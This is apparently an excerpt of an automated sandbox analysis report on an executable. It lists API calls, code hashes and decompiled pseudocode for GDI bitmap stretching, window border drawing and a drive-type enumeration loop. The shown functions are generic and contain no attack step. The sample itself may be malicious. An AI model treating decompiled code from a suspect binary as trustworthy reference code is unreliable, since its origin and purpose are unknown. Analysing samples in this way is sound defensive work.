                                                                                                                                                                                                                            0x00429d54
                                                                                                                                                                                                                            0x00429d5e
                                                                                                                                                                                                                            0x00429d6e
                                                                                                                                                                                                                            0x00429da8
                                                                                                                                                                                                                            0x00429dad
                                                                                                                                                                                                                            0x00429daf
                                                                                                                                                                                                                            0x00429db2
                                                                                                                                                                                                                            0x00429db5
                                                                                                                                                                                                                            0x00429dbe
                                                                                                                                                                                                                            0x00429dc8
                                                                                                                                                                                                                            0x00429dc8
                                                                                                                                                                                                                            0x00429dd1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00429dd7
                                                                                                                                                                                                                            0x00429ddc
                                                                                                                                                                                                                            0x00429ddc

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                              • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,000000FF), ref: 00429C4E
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,000000FF), ref: 00429C5D
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,0000000C), ref: 00429C6F
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00429C7E
                                                                                                                                                                                                                            • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00429CB1
                                                                                                                                                                                                                            • SetStretchBltMode.GDI32(?,00000004), ref: 00429CBF
                                                                                                                                                                                                                            • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00429CD7
                                                                                                                                                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 00429CF4
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00429DDD,?,?,0000000E,00000000,?,0000000C), ref: 00429D54
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00429D69
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00429DC8
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00429DD7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2051775979-0
                                                                                                                                                                                                                            • Opcode ID: 9ae8ba71a01b6d7c1173655bff0cb7420e27a894bb0d9d798ee7fbb1f021728a
                                                                                                                                                                                                                            • Instruction ID: 4bdc1ec2b254633c36354ca88bbdad4dffc819a4d2a14069678e4514baf45347
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ae8ba71a01b6d7c1173655bff0cb7420e27a894bb0d9d798ee7fbb1f021728a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4714675B04205AFDB40DFA9D985F5EBBF8AF08304F5585AAB508E7391C638ED00CB68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426070 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00426070(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L004072E0();
				_v28 = __eax;
				_push(0);
				L004072E0();
				_v32 = __eax;
				_push(_t87);
				_push(0x4261be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00407638();
					_v24 = _t37;
					if(_v24 == 0) {
						E00425FB8(__ecx);
					}
					_push(_t87);
					_push(0x42612d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L004072D8();
					_v20 = _t41;
					if(_v20 == 0) {
						E00425FB8(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x426134);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407888();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L004072C8();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x4261c5);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                                                                                                                                                                                                            0x00426071
                                                                                                                                                                                                                            0x00426073
                                                                                                                                                                                                                            0x0042607e
                                                                                                                                                                                                                            0x0042607f
                                                                                                                                                                                                                            0x00426080
                                                                                                                                                                                                                            0x00426082
                                                                                                                                                                                                                            0x00426085
                                                                                                                                                                                                                            0x00426087
                                                                                                                                                                                                                            0x0042608c
                                                                                                                                                                                                                            0x0042608f
                                                                                                                                                                                                                            0x00426091
                                                                                                                                                                                                                            0x00426096
                                                                                                                                                                                                                            0x0042609b
                                                                                                                                                                                                                            0x0042609c
                                                                                                                                                                                                                            0x004260a1
                                                                                                                                                                                                                            0x004260a4
                                                                                                                                                                                                                            0x004260b1
                                                                                                                                                                                                                            0x004260b8
                                                                                                                                                                                                                            0x004260d2
                                                                                                                                                                                                                            0x004260d4
                                                                                                                                                                                                                            0x004260d9
                                                                                                                                                                                                                            0x004260e0
                                                                                                                                                                                                                            0x004260e2
                                                                                                                                                                                                                            0x004260e2
                                                                                                                                                                                                                            0x004260e9
                                                                                                                                                                                                                            0x004260ea
                                                                                                                                                                                                                            0x004260ef
                                                                                                                                                                                                                            0x004260f2
                                                                                                                                                                                                                            0x004260f8
                                                                                                                                                                                                                            0x004260fc
                                                                                                                                                                                                                            0x004260fd
                                                                                                                                                                                                                            0x00426100
                                                                                                                                                                                                                            0x00426101
                                                                                                                                                                                                                            0x00426106
                                                                                                                                                                                                                            0x0042610d
                                                                                                                                                                                                                            0x0042610f
                                                                                                                                                                                                                            0x0042610f
                                                                                                                                                                                                                            0x00426116
                                                                                                                                                                                                                            0x00426119
                                                                                                                                                                                                                            0x0042611c
                                                                                                                                                                                                                            0x00426121
                                                                                                                                                                                                                            0x00426124
                                                                                                                                                                                                                            0x00426125
                                                                                                                                                                                                                            0x00426127
                                                                                                                                                                                                                            0x0042612c
                                                                                                                                                                                                                            0x004260ba
                                                                                                                                                                                                                            0x004260ba
                                                                                                                                                                                                                            0x004260bc
                                                                                                                                                                                                                            0x004260be
                                                                                                                                                                                                                            0x004260c3
                                                                                                                                                                                                                            0x004260c4
                                                                                                                                                                                                                            0x004260c7
                                                                                                                                                                                                                            0x004260c8
                                                                                                                                                                                                                            0x004260cd
                                                                                                                                                                                                                            0x00426138
                                                                                                                                                                                                                            0x00426147
                                                                                                                                                                                                                            0x00426156
                                                                                                                                                                                                                            0x0042617d
                                                                                                                                                                                                                            0x00426184
                                                                                                                                                                                                                            0x0042618b
                                                                                                                                                                                                                            0x0042618b
                                                                                                                                                                                                                            0x00426192
                                                                                                                                                                                                                            0x00426199
                                                                                                                                                                                                                            0x00426199
                                                                                                                                                                                                                            0x00426192
                                                                                                                                                                                                                            0x004261a0
                                                                                                                                                                                                                            0x004261a3
                                                                                                                                                                                                                            0x004261a6
                                                                                                                                                                                                                            0x004261af
                                                                                                                                                                                                                            0x004261bd
                                                                                                                                                                                                                            0x004261bd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426087
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000), ref: 00426091
                                                                                                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                                                                                                                                                                                            • 73C9A410.GDI32(?,?,00000001,00000001,00000000,00000000,004261BE,?,00000000,00000000), ref: 004260C8
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,00000000,004261BE,?,00000000,00000000), ref: 004260D4
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000000,?,?,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426101
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426134,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426127
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00426142
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426151
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426199
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261AF
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261B8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 956127455-0
                                                                                                                                                                                                                            • Opcode ID: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                                                                                                                                                                                            • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004424F8 Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E00441704(_v8);
					_push(_t120);
					L00407730();
					_v16 = _t120;
					_push(_t237);
					_push(0x44275e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E00441704(_v8),  &_v32);
					GetWindowRect(E00441704(_v8),  &_v48);
					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x49d970; // 0x49e900
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x49d970; // 0x49e900
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x442765);
					_push(_v16);
					_t171 = E00441704(_v8);
					_push(_t171);
					L00407888();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E004329D8(E004328F8());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E00432F08(E004328F8(), 0, _v8);
						}
					}
					return _t205;
				}
			}




















                                                                                                                                                                                                                            0x004424f9
                                                                                                                                                                                                                            0x004424fb
                                                                                                                                                                                                                            0x00442501
                                                                                                                                                                                                                            0x00442504
                                                                                                                                                                                                                            0x00442511
                                                                                                                                                                                                                            0x00442526
                                                                                                                                                                                                                            0x0044252b
                                                                                                                                                                                                                            0x0044252c
                                                                                                                                                                                                                            0x00442531
                                                                                                                                                                                                                            0x00442536
                                                                                                                                                                                                                            0x00442537
                                                                                                                                                                                                                            0x0044253c
                                                                                                                                                                                                                            0x0044253f
                                                                                                                                                                                                                            0x0044254f
                                                                                                                                                                                                                            0x00442561
                                                                                                                                                                                                                            0x00442577
                                                                                                                                                                                                                            0x0044258c
                                                                                                                                                                                                                            0x004425a5
                                                                                                                                                                                                                            0x004425b0
                                                                                                                                                                                                                            0x004425b1
                                                                                                                                                                                                                            0x004425b2
                                                                                                                                                                                                                            0x004425b3
                                                                                                                                                                                                                            0x004425c3
                                                                                                                                                                                                                            0x004425ce
                                                                                                                                                                                                                            0x004425cf
                                                                                                                                                                                                                            0x004425d0
                                                                                                                                                                                                                            0x004425d1
                                                                                                                                                                                                                            0x004425dc
                                                                                                                                                                                                                            0x004425e2
                                                                                                                                                                                                                            0x004425ee
                                                                                                                                                                                                                            0x004425f3
                                                                                                                                                                                                                            0x004425f3
                                                                                                                                                                                                                            0x00442603
                                                                                                                                                                                                                            0x00442608
                                                                                                                                                                                                                            0x00442608
                                                                                                                                                                                                                            0x0044261e
                                                                                                                                                                                                                            0x0044262a
                                                                                                                                                                                                                            0x0044262c
                                                                                                                                                                                                                            0x0044262c
                                                                                                                                                                                                                            0x00442639
                                                                                                                                                                                                                            0x0044263b
                                                                                                                                                                                                                            0x0044263b
                                                                                                                                                                                                                            0x00442648
                                                                                                                                                                                                                            0x0044264a
                                                                                                                                                                                                                            0x0044264a
                                                                                                                                                                                                                            0x00442653
                                                                                                                                                                                                                            0x00442657
                                                                                                                                                                                                                            0x00442660
                                                                                                                                                                                                                            0x00442660
                                                                                                                                                                                                                            0x0044266d
                                                                                                                                                                                                                            0x0044266f
                                                                                                                                                                                                                            0x0044266f
                                                                                                                                                                                                                            0x00442678
                                                                                                                                                                                                                            0x0044267c
                                                                                                                                                                                                                            0x00442685
                                                                                                                                                                                                                            0x00442685
                                                                                                                                                                                                                            0x004426e5
                                                                                                                                                                                                                            0x004426e5
                                                                                                                                                                                                                            0x004426fe
                                                                                                                                                                                                                            0x00442709
                                                                                                                                                                                                                            0x0044270a
                                                                                                                                                                                                                            0x0044270b
                                                                                                                                                                                                                            0x0044270c
                                                                                                                                                                                                                            0x0044271d
                                                                                                                                                                                                                            0x00442739
                                                                                                                                                                                                                            0x00442740
                                                                                                                                                                                                                            0x00442743
                                                                                                                                                                                                                            0x00442746
                                                                                                                                                                                                                            0x0044274e
                                                                                                                                                                                                                            0x00442752
                                                                                                                                                                                                                            0x00442757
                                                                                                                                                                                                                            0x00442758
                                                                                                                                                                                                                            0x0044275d
                                                                                                                                                                                                                            0x00442765
                                                                                                                                                                                                                            0x0044276d
                                                                                                                                                                                                                            0x00442775
                                                                                                                                                                                                                            0x0044277c
                                                                                                                                                                                                                            0x0044277e
                                                                                                                                                                                                                            0x00442785
                                                                                                                                                                                                                            0x00442791
                                                                                                                                                                                                                            0x00442791
                                                                                                                                                                                                                            0x00442785
                                                                                                                                                                                                                            0x0044279c
                                                                                                                                                                                                                            0x0044279c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000), ref: 0044252C
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 0044254F
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00442561
                                                                                                                                                                                                                            • MapWindowPoints.USER32 ref: 00442577
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                                                                                                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00442619
                                                                                                                                                                                                                            • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00442739
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00442765,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00442758
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 156109915-0
                                                                                                                                                                                                                            • Opcode ID: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                                                                                                                                                                                            • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473F50 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 160COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E00473F50(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v56;
				int _t58;
				void* _t59;
				signed int _t67;
				signed int _t80;
				void* _t90;
				intOrPtr _t107;
				void* _t121;
				signed int _t123;
				intOrPtr* _t126;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t121 = __edx;
				_v8 = __eax;
				_push(_t126);
				_push(0x47418f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t126;
				_t123 = GetLogicalDrives();
				_t90 = 0x41;
				do {
					if((0x00000001 << 0xffffffffffffffbf & _t123) != 0) {
						if(_t121 != 0xffffffff) {
							E00404BA8();
							E00404C88( &_v24, 0x4741a8);
							_t58 = GetDriveTypeA(E00404E80(_v24));
							_push(0);
							_push(_t58);
							_t59 = _t121;
							asm("cdq");
							__eflags = 0 - _v56;
							if(__eflags == 0) {
								__eflags = _t59 -  *_t126;
							}
							if(__eflags == 0) {
								E00404BA8();
								E00404CCC( &_v12, 0x4741a8, _v28);
								_t67 = GetDriveTypeA(E00404E80(_v12));
								__eflags = _t67 - 6;
								if(_t67 > 6) {
									L24:
									E00404A58( &_v16, "Unknown");
								} else {
									switch( *((intOrPtr*)(_t67 * 4 +  &M004740DC))) {
										case 0:
											goto L24;
										case 1:
											E00404A58( &_v16, "Invalid root path");
											goto L25;
										case 2:
											__eax =  &_v16;
											__edx = "Removable";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
										case 3:
											__eax =  &_v16;
											__edx = 0x4741e4;
											__eax = E00404A58( &_v16, 0x4741e4);
											goto L25;
										case 4:
											__eax =  &_v16;
											__edx = "Remote (network)";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
										case 5:
											__eax =  &_v16;
											__edx = "CD-ROM";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
										case 6:
											__eax =  &_v16;
											__edx = "RAM disk";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
									}
								}
								L25:
								 *((intOrPtr*)( *_v8 + 0x38))();
							}
						} else {
							E00404BA8();
							E00404CCC( &_v12, 0x4741a8, _v20);
							_t80 = GetDriveTypeA(E00404E80(_v12));
							if(_t80 > 6) {
								L11:
								E00404A58( &_v16, "Unknown");
							} else {
								switch( *((intOrPtr*)(_t80 * 4 +  &M00473FCD))) {
									case 0:
										goto L11;
									case 1:
										E00404A58( &_v16, "Invalid root path");
										goto L12;
									case 2:
										__eax =  &_v16;
										__edx = "Removable";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
									case 3:
										__eax =  &_v16;
										__edx = 0x4741e4;
										__eax = E00404A58( &_v16, 0x4741e4);
										goto L12;
									case 4:
										__eax =  &_v16;
										__edx = "Remote (network)";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
									case 5:
										__eax =  &_v16;
										__edx = "CD-ROM";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
									case 6:
										__eax =  &_v16;
										__edx = "RAM disk";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
								}
							}
							L12:
							 *((intOrPtr*)( *_v8 + 0x38))();
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
					}
					_t90 = _t90 + 1;
				} while (_t90 != 0x5b);
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(0x474196);
				return E004049E4( &_v28, 5);
			}



















                                                                                                                                                                                                                            0x00473f55
                                                                                                                                                                                                                            0x00473f56
                                                                                                                                                                                                                            0x00473f57
                                                                                                                                                                                                                            0x00473f58
                                                                                                                                                                                                                            0x00473f59
                                                                                                                                                                                                                            0x00473f5a
                                                                                                                                                                                                                            0x00473f5e
                                                                                                                                                                                                                            0x00473f60
                                                                                                                                                                                                                            0x00473f65
                                                                                                                                                                                                                            0x00473f66
                                                                                                                                                                                                                            0x00473f6b
                                                                                                                                                                                                                            0x00473f6e
                                                                                                                                                                                                                            0x00473f76
                                                                                                                                                                                                                            0x00473f78
                                                                                                                                                                                                                            0x00473f7a
                                                                                                                                                                                                                            0x00473f8a
                                                                                                                                                                                                                            0x00473f93
                                                                                                                                                                                                                            0x00474070
                                                                                                                                                                                                                            0x0047407d
                                                                                                                                                                                                                            0x0047408b
                                                                                                                                                                                                                            0x00474092
                                                                                                                                                                                                                            0x00474093
                                                                                                                                                                                                                            0x00474094
                                                                                                                                                                                                                            0x00474096
                                                                                                                                                                                                                            0x00474097
                                                                                                                                                                                                                            0x0047409b
                                                                                                                                                                                                                            0x0047409d
                                                                                                                                                                                                                            0x0047409d
                                                                                                                                                                                                                            0x004740a2
                                                                                                                                                                                                                            0x004740ad
                                                                                                                                                                                                                            0x004740bd
                                                                                                                                                                                                                            0x004740cb
                                                                                                                                                                                                                            0x004740d0
                                                                                                                                                                                                                            0x004740d3
                                                                                                                                                                                                                            0x00474152
                                                                                                                                                                                                                            0x0047415a
                                                                                                                                                                                                                            0x004740d5
                                                                                                                                                                                                                            0x004740d5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474100
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474107
                                                                                                                                                                                                                            0x0047410a
                                                                                                                                                                                                                            0x0047410f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474116
                                                                                                                                                                                                                            0x00474119
                                                                                                                                                                                                                            0x0047411e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474125
                                                                                                                                                                                                                            0x00474128
                                                                                                                                                                                                                            0x0047412d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474134
                                                                                                                                                                                                                            0x00474137
                                                                                                                                                                                                                            0x0047413c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00474143
                                                                                                                                                                                                                            0x00474146
                                                                                                                                                                                                                            0x0047414b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004740d5
                                                                                                                                                                                                                            0x0047415f
                                                                                                                                                                                                                            0x00474167
                                                                                                                                                                                                                            0x00474167
                                                                                                                                                                                                                            0x00473f99
                                                                                                                                                                                                                            0x00473f9e
                                                                                                                                                                                                                            0x00473fae
